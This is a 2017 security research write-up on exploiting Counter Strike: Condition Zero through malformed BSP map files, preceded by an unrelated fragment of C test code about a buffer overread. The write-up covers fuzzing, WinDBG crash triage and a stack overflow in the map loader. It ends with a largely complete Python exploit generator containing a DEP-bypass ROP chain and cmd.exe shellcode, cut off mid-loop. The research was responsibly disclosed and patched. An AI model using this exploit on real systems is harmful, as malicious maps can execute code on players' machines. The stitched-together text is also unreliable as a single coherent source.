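size_t overread_bytes(size_t stop, size_t alloc)
{
    return stop > alloc ? stop - alloc : 0;
}

/* Constructed arena: CONN_BUF_SIZE bytes of header data with neither NUL nor
 * separator, followed by "stale heap" filler and a NUL at STRAY_NUL_OFFSET.
 * The caller frees the result. */
char *make_arena(void)
{
    size_t arena = STRAY_NUL_OFFSET + 1;
    char *p = malloc(arena);
    if (!p) return NULL;
    memset(p, 'A', arena);
    p[STRAY_NUL_OFFSET] = '\0';
    return p;
}

int main(void)
{
    char *conn = make_arena();
    if (!conn) return 1;
    size_t bad  = scan_unbounded(conn, ':');
    size_t good = scan_bounded(conn, CONN_BUF_SIZE, ':');
    printf("unbounded scan stopped at %zu (%zu bytes past the %d-byte buffer)\n",
           bad, overread_bytes(bad, CONN_BUF_SIZE), CONN_BUF_SIZE);
    printf("bounded scan stopped at %zu (no separator found)\n", good);
    free(conn);
    return 0;
}
```

Run under valgrind with the arena shrunk to exactly CONN_BUF_SIZE bytes and scan_unbounded reproduces the triage picture: an invalid read reported some distance past the allocation, with the distance depending on whatever stale heap content follows, which is also why AFL's stability figure drops.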
-
Lock and Load: Exploiting Counter Strike via BSP Map Files

Jul 7, 2017 • Grant

What makes Counter Strike an interesting target is that it relies on a game lobby for players to find and select servers to play on. Upon connecting to the server, the game client will automatically download any required resources (maps, textures, sounds, etc.). Once all of the resources have been downloaded, they have to be loaded and parsed from disk into memory. Only then will the client begin receiving commands and entity updates from the server. This automatic resource fetching looked like the ticket to a remotely exploitable vulnerability via a local file.

The vulnerability discussed in this article has been disclosed to Valve Security and the patch publicly deployed on July 10th. I would like to extend my thanks to the Valve Security team and specifically to Alfred Reynolds, who was my liaison during the disclosure process. The whole process, from initial email to fix, lasted less than 30 days. I certainly look forward to disclosing to Valve in the future.

Go, go, go! - Finding Crashes

My approach to finding bugs was to use the tried and true method of fuzzing. Essentially I gathered a bunch of existing BSP map files for my corpus and then used them as seeds to my fuzzing engine. This will corrupt them and then feed them back into the program (CZ) to be parsed while being watched for any crashes. If a crash is found, it is recorded and stored for later triage and classification. I figured that highly complex file formats such as .BSP would map quite well to low-level memcpy operations in the engine. It's even possible that stored sizes of data structures in the BSP file will be less validated than in most file formats.

I had a few false starts to this project when selecting a fuzzer to use. First I tried honggfuzz under Cygwin, but this proved to be completely broken for crash detection. Next I tried WinAFL, which I was unable to get to work due to some binary incompatibilities and possible Windows 10 issues. This led to a multi-day rabbit hole of building DynamoRIO from source and rebuilding WinAFL against it. In the end I gave up trying to get a coverage based fuzzer to work and went instead with the solid CERT Basic Fuzzing Framework (BFF). This proved to be an excellent choice due to its easy configuration file and deep integration with Microsoft debugging tools, including WinDBG and !exploitable. I also had some relevant experience with the framework through fuzzing VLC when it used to be called Failure Observation Engine (FOE). BFF is a simple "dumb" fuzzer, meaning it merely corrupts bytes in the file and writes it back out. It has no knowledge of the BSP file format or of the target it is fuzzing. This is great for quick setup, but for more complex formats, code coverage of the parsing code may be limited. For shallow bugs, dumb fuzzing will not have much of an issue finding them.

With this fuzzer in mind, I went about exploring instrumentation on the GoldSrc engine. When running a game on this engine, the executable hl.exe boots, loads common engine resources, and then loads a game specific DLL (known as a client DLL or cl_dll) which drives the engine via a proxy API. This API and the associated utilities are the primary SDK interface that many game modders deal with. Technically Counter Strike 1.6 (cstrike) and Condition Zero (czero) are both considered "mods" as they merely use the proxy API for gameplay. When running a mod like CZ, the engine command line looks like: hl.exe -game czero $OTHER_ARGS. In order to quickly iterate through map files, I looked up the command line flags for starting the engine with CZ and to load a map upon start.
This is the command line I used:

    C:\Program Files (x86)\Steam\steamapps\common\Half-Life\hl.exe -game czero -dev -window -console +sv_lan 1 +map MAP_NAME

where -window makes it so I can fuzz and browse the web at the same time, sv_lan 1 makes a local-only server, and map immediately changes the map on login. With the ability to programmatically run the engine, I installed BFF, Debugging Tools for Windows, and then started configuring BFF. BFF installs to C:\BFF by default and has the concept of a fuzzing campaign. I started a new one for CZ and then edited the bff.yaml configuration file:

    campaign:
        id: counter strike czero
        keep_heisenbugs: False
        use_buttonclicker: False

    target:
        program: C:\Users\MyName\.babun\cygwin\bin\bash.exe
        cmdline_template: $PROGRAM -c '"C:/BFF/mover.sh" $SEEDFILE "C:/Program Files (x86)/Steam/steamapps/common/Half-Life/hl.exe" -game czero -dev -window -console +sv_lan 1 +map aim_fuzz' NUL

    ...

    directories:
        seedfile_dir: seedfiles\bsp
        working_dir: fuzzdir
        results_dir: results

    ...

    fuzzer:
        fuzzer: bytemut
        fuzz_zip_container: False

Everything except program, cmdline_template, and seedfile_dir are the defaults. Notice that this cmdline isn't just running hl.exe. This is because I ran into problems getting the corrupted BSP file to be read by the engine. GoldSrc has a dedicated, per-mod resource directory and will not load resources based on an absolute path. Hence, I made a bash script under Cygwin to first move the generated BSP file to the resource directory as aim_fuzz.bsp. It's a simple three-liner, it gets the job done, and doesn't affect crash detection due to exec:

    /bin/cp "$1" "c:\\Program Files (x86)\\Steam\\steamapps\\common\\Half-Life\\czero_downloads\\maps\\aim_fuzz.bsp"
    shift
    exec "$@"

It's unfortunate that BFF doesn't support post-processing fuzzed files like honggfuzz does, since this would have eliminated the need for this hack.
With the fuzzer set up, I copied all of the map files less than 3.0 MB from my czero_downloads/maps folder into the seedfiles\bsp directory. This left me with 74 map files as seeds. I could have used more, but as you will see, finding crashes was not that difficult.

Fire in the Hole! - Triaging Crashes

After running for less than a day on a single Windows 10 x64 machine, 43 crashes were found. It's no surprise that the BSP parsing turned up a lot of unique crashes as it's a complex file format combining many different data objects into one format. Here's the crash breakdown by predicted severity:

- 3 - EXPLOITABLE
- 5 - PROBABLY_EXPLOITABLE
- 35 - UNKNOWN

Thanks to MSEC's !exploitable, most of the hard crash triage was already done. Each crash folder had the minimized test case along with a full WinDBG log and !analyze output. In order to reproduce these crashes, BFF provides a nice script called repro.py. Running python C:\BFF\tools\repro.py -w PATH_TO_FUZZED_FILE will drop you into a WinDBG GUI for further investigation. With that, let's take a look at the three EXPLOITABLE crashes.

Crash #1

Now this looks interesting. EIP looks like ASCII which might mean we have control over it!

    ...
    Spawn Server aim_fuzz
    Clearing memory
    Using WAD File: uacyber_stproz.wad
    Using WAD File: as_tundra.wad
    Using WAD File: halflife.wad
    Using WAD File: cs_dust.wad
    Using WAD File: cs_cbble.wad
    Texture load: 56.7ms
    WARNING: failed to locate sequence file aim_fuzz
    "sv_maxspeed" changed to "900"
    GAME SKILL LEVEL:1
    "pausable" changed to "0"
    Executing listen server config file
    (465c.4c78): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    44334143 ?? ???
    ...
    !exploitable 1.6.0.0
    HostMachine\HostUser
    Executing Processor Architecture is x86
    Debuggee is in User Mode
    Debuggee is a live user mode debugging session on the local machine
    Event Type: Exception
    Exception Faulting Address: 0x44334143
    First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
    Exception Sub-Type: Data Execution Protection (DEP) Violation
    Exception Hash (Major/Minor): 0x1e2606b6.0x1e2606b6
    Hash Usage : Stack Trace:
    Major+Minor : Unknown
    Instruction Address: 0x0000000044334143
    Description: Data Execution Prevention Violation
    Short Description: DEPViolation
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000044334143 (Hash=0x1e2606b6.0x1e2606b6)

Unfortunately further investigation showed that this wasn't the case and EIP just coincidentally got an ASCII-only value. Let's dive into IDA to investigate... but where was the original faulting instruction? How did we get to 0x44334143? This called for some WinDBG learning. I needed a way to know what the last instruction was right before the DEP violation. Originally, before writing this post, I had single stepped WinDBG until arriving at the faulting address. But now when I reproduce the crash I've come to realize that the backtrace contains the last stack frame. If this crash had caused stack corruption then this approach wouldn't have worked, since stack corruption would have corrupted the stack frames (i.e. the saved EBP value).

    1:005:x86> kb
    ChildEBP RetAddr  Args to Child
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    0019f2c0 00000000 028e433d 10342a7c 10342a88 0x44334143
    1:005:x86> r
    eax=00000080 ebx=10342a88 ecx=10342a7c edx=1069d298 esi=106e4b34 edi=10342938
    eip=44334143 esp=0019f2c4 ebp=0019f2e4 iopl=0         ov up ei pl nz ac pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210a16
    44334143 ?? ???
I tried visiting 0x28e433d in IDA and I saw this function call:

Stepping into this function showed this:

It looks like the jmp target has been controlled from a starting offset via EAX. It looks like an attempt was made to prevent the function pointer index from going above 7, but JGE on x86 is a signed comparison! This means that EAX can go negative (0x80 - 0xff) and pass the check as this signed char is cast to unsigned char for the jump. In WinDBG at the time of the crash, EAX was 0x80. Doing some pointer math of 0x297bad4 + (0x80 * 4) = 0x297bcd4 and then a lookup in IDA shows at the calculated address:

If you notice, the CA3D string matches perfectly to our crashing address, except its bytes are reversed. The hex dump confirms this:

So what we have is a controlled function pointer load and transfer within a range of 127 DWORDs. This read occurs from the .data section, which is read-write, but from this point, we'd have to find a controlled place in this tight range to write a known code address. With this understanding and a bit of disappointment I moved on to the other crashers to see if I'd have any better luck.

Crash #2

The next crash turns out to be a little bit more interesting but not obviously easier to get code execution.

    ...
    Adding: czero/dlls\mp.dll
    ModLoad: 00000000`256d0000 00000000`25860000 c:\program files (x86)\steam\steamapps\common\half-life\czero\dlls\mp.dll
    Dll loaded for mod Condition Zero
    ModLoad: 00000000`607e0000 00000000`6086e000 c:\program files (x86)\steam\steamapps\common\half-life\platform\servers\serverbrowser.dll
    ModLoad: 00000000`61700000 00000000`61757000 C:\Program Files (x86)\Steam\steamapps\common\Half-Life\vstdlib.dll
    MP3_InitStream(30, sound\music\downed_intro.mp3) successful
    Spawn Server aim_fuzz
    Clearing memory
    (61b8.7004): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    ** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\Half-Life\hw.dll -
    hw+0x3f53f:
    0285f53f 8906            mov     dword ptr [esi],eax  ds:002b:77023e00=5d00191d
    ...
    !exploitable 1.6.0.0
    HostMachine\HostUser
    Executing Processor Architecture is x86
    Debuggee is in User Mode
    Debuggee is a live user mode debugging session on the local machine
    Event Type: Exception
    ** ERROR: Symbol file could not be found. Defaulted to export symbols for hl.exe -
    Exception Faulting Address: 0x77023e00
    First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
    Exception Sub-Type: Write Access Violation
    Faulting Instruction:0285f53f mov dword ptr [esi],eax
    Exception Hash (Major/Minor): 0xdfa48bac.0x58d60243
    Hash Usage : Stack Trace:
    Major+Minor : hw+0x3f53f
    ...
    Minor : ntdll_77470000!_RtlUserThreadStart+0x1b
    Instruction Address: 0x000000000285f53f
    Description: User Mode Write AV
    Short Description: WriteAV
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - User Mode Write AV starting at hw+0x000000000003f53f (Hash=0xdfa48bac.0x58d60243)

From this crash log, it looks like we have control over ESI. Further investigation in IDA and some reverse code lookups in ReHLDS found the original function:

    void Mod_LoadTextures(lump_t *l)
    {
        dmiptexlump_t *m;
        miptex_t *mt;
        ...
        char dtexdata[348996];
        ...
        texture_t *tx;

        wads_parsed = 0;
        starttime = Sys_FloatTime();
        if (!tested)
            Mod_AdInit();

        if (!l->filelen)
        {
            loadmodel->textures = 0;
            return;
        }

        m = (dmiptexlump_t *)(mod_base + l->fileofs);  // looks like we corrupted a lump header
        m->_nummiptex = LittleLong(m->_nummiptex);     // the crashing line
        loadmodel->numtextures = m->_nummiptex;
        loadmodel->textures = (texture_t **)Hunk_AllocName(4 * loadmodel->numtextures, loadname);
        ...

Looks like a corrupted lump fileofs which caused a bad pointer dereference on line 468.
This is interesting as we have control over the entire lump contents, but it’s going to require some more reading to figure out how to achieve code execution. Overall this function is a mess of direct pointer arithmetic and there are bound to be many more ways to make this function crash. Some more digging would probably yield a write-what-where primitive, but I moved on to the next crash to see if it was easier to exploit.

Crash #3

The last crash turned out to be quite interesting. The fuzzed BSP file was based upon the map awp_snowsk337.bsp (a really fun map). Here is the WinDBG output of the two crashing exceptions:

...
Spawn Server aim_fuzz
Clearing memory
Texture load: 50.3ms
(ab5c.72b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\Half-Life\hw.dll -
hw+0x4ddd7:
0286ddd7 8941f8          mov     dword ptr [ecx-8],eax  ds:002b:001a0000=78746341
...
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x1a0000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0xfa8446e7.0xb321cd22
Hash Usage : Stack Trace:
Major+Minor : hw+0x4ddd7
...
Minor : Unknown
Instruction Address: 0x000000000286ddd7
Description: Exception Handler Chain Corrupted
Short Description: ExceptionHandlerCorrupted
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at hw+0x000000000004ddd7 (Hash=0xfa8446e7.0xb321cd22)

And when continuing from this first chance exception to the Structured Exception Handler (SEH):

1:005:x86> g;$$Found_with_CERT_BFF_2.8;r;!exploitable -v;q
ModLoad: 70e20000 70e33000   C:\WINDOWS\SysWOW64\dhcpcsvc6.DLL
ModLoad: 70e00000 70e14000   C:\WINDOWS\SysWOW64\dhcpcsvc.DLL
(694c.9748): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=44980000 edx=774f2d90 esi=00000000 edi=00000000
eip=44980000 esp=0019ea58 ebp=0019ea78 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
44980000 ??              ???
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x44980000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Data Execution Protection (DEP) Violation
Exception Hash (Major/Minor): 0x918f89cc.0x7f62488f
Hash Usage : Stack Trace:
Major+Minor : Unknown
Excluded : ntdll_77470000!ExecuteHandler2+0x26
Excluded : ntdll_77470000!ExecuteHandler+0x24
Excluded : ntdll_77470000!KiUserExceptionDispatcher+0xf
Excluded : Unknown
...
Excluded : Unknown
Instruction Address: 0x0000000044980000
Description: Data Execution Prevention Violation
Short Description: DEPViolation
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000044980000 called from Unknown Symbol @ 0xffffffffc40e0000 (Hash=0x918f89cc.0x7f62488f)

This crash transferred control to the default SEH on the stack, the trigger being an access violation after dereferencing the stack guard page. It looks like a nearly unlimited buffer overflow, which is exactly the type of exploitability I was looking for. BFF happens to provide some heuristics to determine the “Exploitability Rank” and it gave this a 5/100 (lower is better). Crash #1 had a score of 20 (possibly exploitable) and Crash #2 a 100 (no way).

The SEH handler’s address was overwritten to 0x44980000, which happens to be the float value of 1216.0. A quick search of the corrupted file with 010 Editor yielded hundreds of values like this. In order to determine the exact value that would give us control over the SEH handler, I wrote a script to incrementally replace each found value with an incrementing float value. Rerunning with the new BSP file yielded a file offset of 0x4126C bytes. Now I had control over EIP! Observe:

1:005:x86> r
(694c.9748): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=deadbeef edx=774f2d90 esi=00000000 edi=00000000
eip=deadbeef esp=0019ea58 ebp=0019ea78 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
deadbeef ??              ???

From this point (due to DEP) I needed to ROP out of the exception handler frame and back to the old stack. For this I needed a special gadget of the form pop REG32, pop REG32, pop esp, ret or similar.
The next tool that helped me start ROPing was !mona running under Immunity DBG. Using mona’s “findwild” gadget search, I tried to find an appropriate stack pivot in non-ASLR’d, non-rebased modules, but I was unable to after many hours of poring over gadgets. This was quite disappointing. Luckily I still had complete control over the stack frame, so all I needed to do was to find out how to overwrite the saved return address for the function. Dropping into IDA revealed a reasonably simple function. (Note: this function was difficult to understand at first and it took me a while to understand the mapping from the BSP file to the code. This is the finished version before I found the source code online and learned the real names and data types. Many days of hard work are being glossed over.)

int __cdecl GL_SubdivideSurface(MapInfo *object)
{
  signed int numVerts; // ecx@1
  int numVertsToProc; // edi@1
  struct_gData *bObject; // edx@2
  int initialIndex; // esi@2
  float *pVEC3DATA; // ecx@2
  int indexPos; // esi@2
  signed int index; // edi@3
  int offset; // eax@4
  float *pVEC3; // eax@6
  float VEC3DATA[192]; // [sp+4h] [bp-304h]@2
  int numVertsStack; // [sp+304h] [bp-4h]@2
  int vec3Count; // [sp+310h] [bp+8h]@2

  numVerts = 0;
  g_modVuln = object;
  numVertsToProc = object->numVerts;
  if ( numVertsToProc > 0 )
  {
    bObject = g_CurBObject;
    initialIndex = object->initialIndex;  // 00002c4c
    pVEC3DATA = &VEC3DATA[1];
    vec3Count = object->numVerts;         // initially 0x9c (this was corrupted from fuzzer)
    indexPos = initialIndex;
    numVertsStack = numVertsToProc;
    do
    {
      index = bObject->INDEX_BUFFER[indexPos];
      if ( index <= 0 )
        offset = bObject->VERTEX_BUFFER_INDEX[-4 * index + 1];
      else
        offset = bObject->VERTEX_BUFFER_INDEX[4 * index];
      ++indexPos;
      pVEC3DATA += 3;
      pVEC3 = &bObject->VECTOR_DATA[3 * offset];
      *(pVEC3DATA - 4) = *pVEC3;
      *(pVEC3DATA - 3) = pVEC3[1];
      *(pVEC3DATA - 2) = pVEC3[2];        // overwrite here
      --vec3Count;
    }
    while ( vec3Count );
    numVerts = numVertsStack;
  }
  return SubdivideSurface(numVerts, (int)VEC3DATA); // if numverts == 0, this function returns quick
}

By reading the excellent IDA decompiled source with struct types, I determined that BFF had corrupted the vec3Count variable. This caused more than 64 VEC3 (three 4-byte floats) to be placed into the VEC3DATA struct, causing the numVertsStack and vec3Count variables to be corrupted. vec3Count was corrupted to a large number, which is why we saw the exception at 0286ddd7 mov dword ptr [ecx-8],eax when it overwrote the guard page.

Get out of there, it’s gonna blow! - Exploiting the Crash

At this point I still needed to solve three problems in order to gain code execution:

1. Where in the BSP file do the VECTOR_DATA, INDEX_BUFFER and VERTEX_BUFFER_INDEX data streams map to?
2. How do I bypass the SubdivideSurface function so that GL_SubdivideSurface returns?
3. How do I disable DEP and start running shellcode?

Problem #1

I did some more digging with 010 Editor (this tool proved so invaluable that I bought it) and, using a similar approach to finding the SEH handler offset, I found the starting offsets for all three buffers. There was some guessing and fudging of the numbers to get things just right, but it worked for the file I was corrupting, so I didn’t worry about perfecting it. In possible future BSP exploits, I’d like to understand more about the file format in order to create more knowledgeable exploit generators. My first effort towards this has been the creation of an 010 Editor binary template file for parsing out the Half-Life 1 BSP format (version 30 with no magic FourCC value in the header). 010 Editor is my go-to tool for reverse engineering and viewing binary file formats.

The BSP format has many versions and modifications. The Half-Life 1 version is documented here. In short, BSP is made up of “lumps” which are just blocks of bytes that have a defined data structure, such as textures, vertices, edges, faces, entities, etc.
Through fuzzing, different parts of the lumps will be affected, which will affect the parsing of the file.

Problem #2

The GL_SubdivideSurface function must return in order to pop the corrupted saved return address off the stack, but there is a tail call of SubdivideSurface which prevents this. Also there is a bounds check on numVerts which limits it to 60 (not enough to overflow important data).

int __cdecl SubdivideSurface(signed int numVerts, int object)
{
  if ( numVerts > 60 )
    sub_28C8450("numverts = %i", numVerts);
  sub_286D4C0(numVerts, (float *)object, (int)v35, (int)v31);
  for ( i = 0; ; ++i )
  {
    if ( i >= 3 )
    {
      result = sub_28E5D30(28 * (numVerts - 4) + 128);
      v26 = result;
      *(_DWORD *)result = gWarpface->field_24;
      *(_DWORD *)(result + 12) = *(_DWORD *)&gWarpface->gap0[8];
      gWarpface->field_24 = result;
      *(_DWORD *)(result + 8) = numVerts;
      v30 = 0;
      while ( v30 < numVerts )
      {
        ...
      }
      return result; // we want to reach here to exit quickly
    }
    v2 = (v35[i] + v31[i]) * 0.5;
    v24 = floor(v2 / 64.0 + 0.5) * 64.0;
    if ( v31[i] - v24 >= 8.0 && v24 - v35[i] >= 8.0 )
      break;
  }
  ...
  SubdivideSurface(v34, (int)&v39);
  return SubdivideSurface(v46, (int)&v43);
}

Further reading of this function made me realize that if I could somehow change the numVerts input argument then I could quickly bypass this function. To my luck, the GL_SubdivideSurface stack frame had numVerts right below the overflowed buffer. This meant that I could control the variable to fake the number of vertices processed by SubdivideSurface, effectively bypassing it.

Problem #3

With the knowledge of where to place my data in the BSP file (to cause reliable bytes to be placed on the stack), I just needed a nice ROP chain that would allow me to disable DEP on the current stack page and then jump to my shellcode. Mona to the rescue! Simply running !mona rop and waiting an hour, I was left with a nice, DEP-disabling ROP chain.
I also learned that you can use VirtualAlloc on already allocated memory to set flags, just like VirtualProtect. I initially tried to use VirtualProtect, but none of the safe modules had any references to it. Only four modules were available for ROP gadgets in the process: hl.exe, filesystem_stdio.dll, hw.dll, steamclient.dll, and icudt.dll. Unfortunately the reliability of this exploit was limited due to the heavy usage of gadgets from steamclient.dll, which changes on every steam update. This actually happened during my exploitation process, necessitating a re-generation of my gadgets. What a pain!

Hours of debugging and testing with WinDBG later, I had successfully confirmed that this ROP chain was working! All I needed was to change my exploit script to add in some shellcode and I was golden. I found some Windows Universal cmd.exe shellcode from Shell Storm and BOOM! Command prompt appeared. Check out a video of it in action.

Here is the complete exploit code that I wrote to get control over the BSP file and get code running:

#!/usr/bin/env python
# Counter Strike: Condition Zero BSP map exploit
# By @Digital_Cold Jun 11, 2017

from binascii import hexlify, unhexlify
from struct import pack, unpack
import math
import mmap
import logging

fmt = "[+] %(message)s"
logging.basicConfig(level=logging.INFO, format=fmt)
l = logging.getLogger("exploit")

# Specific to the file
INDEX_BUFFER_OFF = 0x92ee0           # ARRAY[int]
VERTEX_BUFFER_INDEXES_OFF = 0xA9174  # ARRAY[unsigned short]
VERTEX_DATA_OFF = 0x37f7c            # ARRAY[VEC3], VEC3[float, float, float]
NUM_EDGES_OFF = 0x70f94              # The length that was fuzzed to cause the crash

# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
# SEH_OVERWRITE_OFF = 0x4126C

# Initial offset into the index buffer where the function to exploit resides
INITIAL_OFFSET = 0xb130  # this is multiplied by 4 for data type size already

# INDEX_BUFFER
# 0: 20
# 1: 10
# 2: 2 --> Vertex Buffer Indexes
# VERTEX BUFFER INDEXES
# 0: 1
# 1: 2
# 2: 4 --> Vertex Data
# VERTEX DATA
# 0: 1.23, 23423.0, 3453.3
# 1: 1.23, -9.0, 3453.3
# 2: 1.0, 1.0, 1.0
# 3: 1.0, 1.0, 1.0
# 4: 0.0, 1.0, 0.0
# Example:
# a = INDEX_BUFFER[2]   ; a = 2
# b = VERTEX_BUFFER[a]  ; b = 4
# vec = VERTEX_DATA[b]  ; vec = 0.0, 1.0, 0.0

def dw(x):
    return pack("I", x)

def main():
    target_file = "eip-minimized.bsp"
    output_file = "exploit-gen.bsp"

    print "GoldSource .BSP file corruptor"
    print "  by @Digital_Cold"
    print

    l.info("Corrupting target file %s" % target_file)

    # Read in and memory map target file
    fp = open(target_file, 'rb')
    mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
    fp.close()

    VEC3_COUNT = 63 # then come Saved EBP and return address

    start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
    second_idx = VERTEX_BUFFER_INDEXES_OFF
    vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults

    l.info("Writing to index buffer offset %08x...", start_idx)
    l.info("Vertex buffer indexes start %08x", second_idx)
    l.info("Vertex data at %08x", vertex_data_start)

    data_buffer = []

    for i in range(VEC3_COUNT):
        for j in range(3):
            data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory

    data_buffer.append("\x00\x00\x00\x00") # dont care
    data_buffer.append("\x00\x00\x00\x00") # unk1
    data_buffer.append("\x00\x00\x00\x00") # unk2
    data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
    data_buffer.append("\x00\x00\x00\x00") # EBP
    data_buffer.append(dw(0x01407316))     # Saved Ret --> POP EBP; RET [hl.exe]

    # XXX: bug in mona. This is a ptr to VirtualProtectEx!!
    # 0x387e01ec,  # ptr to &VirtualProtect() [IAT steamclient.dll]

    """
    Register setup for VirtualAlloc() :
    --------------------------------------------
     EAX = NOP (0x90909090)
     ECX = flProtect (0x40)
     EDX = flAllocationType (0x1000)
     EBX = dwSize
     ESP = lpAddress (automatic)
     EBP = ReturnTo (ptr to jmp esp)
     ESI = ptr to VirtualAlloc()
     EDI = ROP NOP (RETN)
    --- alternative chain ---
     EAX = ptr to &VirtualAlloc()
     ECX = flProtect (0x40)
     EDX = flAllocationType (0x1000)
     EBX = dwSize
     ESP = lpAddress (automatic)
     EBP = POP (skip 4 bytes)
     ESI = ptr to JMP [EAX]
     EDI = ROP NOP (RETN)
    + place ptr to "jmp esp" on stack, below PUSHAD
    --------------------------------------------
    """

    # START ROP CHAIN
    # DEP disable ROP chain
    # rop chain generated with mona.py - www.corelan.be
    #
    # useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
    rop_gadgets = [
        #0x3808A308,  # INT3 # RETN [steamclient.dll]
        0x38420ade,   # POP EDX # RETN [steamclient.dll]
        0x387e01e8,   # ptr to &VirtualAlloc() [IAT steamclient.dll]
        0x381236c5,   # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
        0x381ebdc1,   # POP EBP # RETN [steamclient.dll]
        0x381f98cd,   # & jmp esp [steamclient.dll]
        0x387885ac,   # POP EBX # RETN [steamclient.dll]
        0x00000001,   # 0x00000001-> ebx
        0x384251c9,   # POP EDX # RETN [steamclient.dll]
        0x00001000,   # 0x00001000-> edx
        0x387cd449,   # POP ECX # RETN [steamclient.dll]
        0x00000040,   # 0x00000040-> ecx
        0x386c57fe,   # POP EDI # RETN [steamclient.dll]
        0x385ca688,   # RETN (ROP NOP) [steamclient.dll]
        0x0140b00e,   # POP EAX # RETN [hl.exe]
        0x90909090,   # nop
        0x385c0d3e,   # PUSHAD # RETN [steamclient.dll]
    ]

    # Can be replaced with ANY shellcode desired...
    # http://shell-storm.org/shellcode/files/shellcode-662.php
    shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
                "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
                "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
                "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
                "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
                "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
                "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
                "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
                "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
                "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
                "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
                "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
                "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
                "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
                "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
                "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
                "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
                "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
                "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
                "\x24\x20\x57\xFF\xD0"

    shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
    shellcode += "\xeb\xfe"
    shellcode += "\xeb\xfe"
    shellcode += "\xeb\xfe"
    shellcode += "\xeb\xfe"

    shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
    extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))

    # Loop count (needs to be the exact amount of ROP we want to write)
    data_buffer.append(dw(extra_dwords))

    for addr in rop_gadgets:
        data_buffer.append(dw(addr))

    for b in range(shellcode_dwords):
        data = ""
        for byte in range(4):
            idx = byte + b*4
            # pad to nearest DWORD with INT3
            if idx >= len(shellcode):
                data += "\xcc"
            else:
                data += shellcode[idx]
        data_buffer.append(data)

    second_idx += 8000*4 # times 4 because we skip every-other WORD, which means each index has 4 bytes
                         # 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
                         # we can exploit the function

    # UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
    #mmfile[NUM_EDGES_OFF] = pack("B", 0x41)

    for i in range(int(math.ceil(len(data_buffer)/3.0))):
        mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
        mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
        second_idx += 2 # required because the game loads every-other word

        # This data will now be on the stack
        for j in range(3):
